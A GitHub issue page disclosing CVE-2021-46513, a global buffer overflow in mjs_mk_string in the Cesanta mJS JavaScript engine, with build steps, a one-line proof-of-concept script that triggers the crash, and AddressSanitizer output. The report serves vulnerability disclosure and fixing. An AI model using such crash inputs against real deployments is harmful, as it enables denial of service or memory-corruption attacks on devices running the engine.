Headline
CVE-2021-46513: Global-buffer-overflow mjs/src/mjs_string.c:58:15 in mjs_mk_string · Issue #189 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via mjs_mk_string at mjs/src/mjs_string.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
hope-fly opened this issue
Dec 31, 2021
· 0 comments
Comments
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
(JSON.stringify([1, 2, 3]))((JSON.stringify + 6.54321e2)(JSON.stringify([1, 2, 3])));
Execution steps & Output
$ ./mjs/build/mjs poc.js
==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064330b at pc 0x0000005b16f4 bp 0x7ffcd99733d0 sp 0x7ffcd99733c8 READ of size 8 at 0x00000064330b thread T0 #0 0x5b16f3 in mjs_mk_string /root/mjs/src/mjs_string.c:58:15 #1 0x580796 in mjs_op_json_stringify /root/mjs/src/mjs_json.c:495:13 #2 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #3 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #4 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #5 0x7f43da272b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/…/csu/libc-start.c:310 #6 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
0x00000064330b is located 53 bytes to the left of global variable ‘<string literal>’ defined in ‘src/mjs_builtin.c:140:21’ (0x643340) of size 4 ‘<string literal>’ is ascii string ‘ffi’ 0x00000064330b is located 5 bytes to the right of global variable ‘<string literal>’ defined in ‘src/mjs_builtin.c:138:21’ (0x643300) of size 6 ‘<string literal>’ is ascii string ‘print’ SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/mjs_string.c:58:15 in mjs_mk_string Shadow bytes around the buggy address: 0x0000800c0610: f9 f9 f9 f9 00 00 00 00 00 00 00 05 f9 f9 f9 f9 0x0000800c0620: 00 06 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800c0630: 00 02 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800c0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800c0650: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 =>0x0000800c0660: 06[f9]f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c0670: 00 04 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800c0680: 07 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c0690: 03 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c06a0: 04 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 0x0000800c06b0: 06 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==ABORTING
1 participant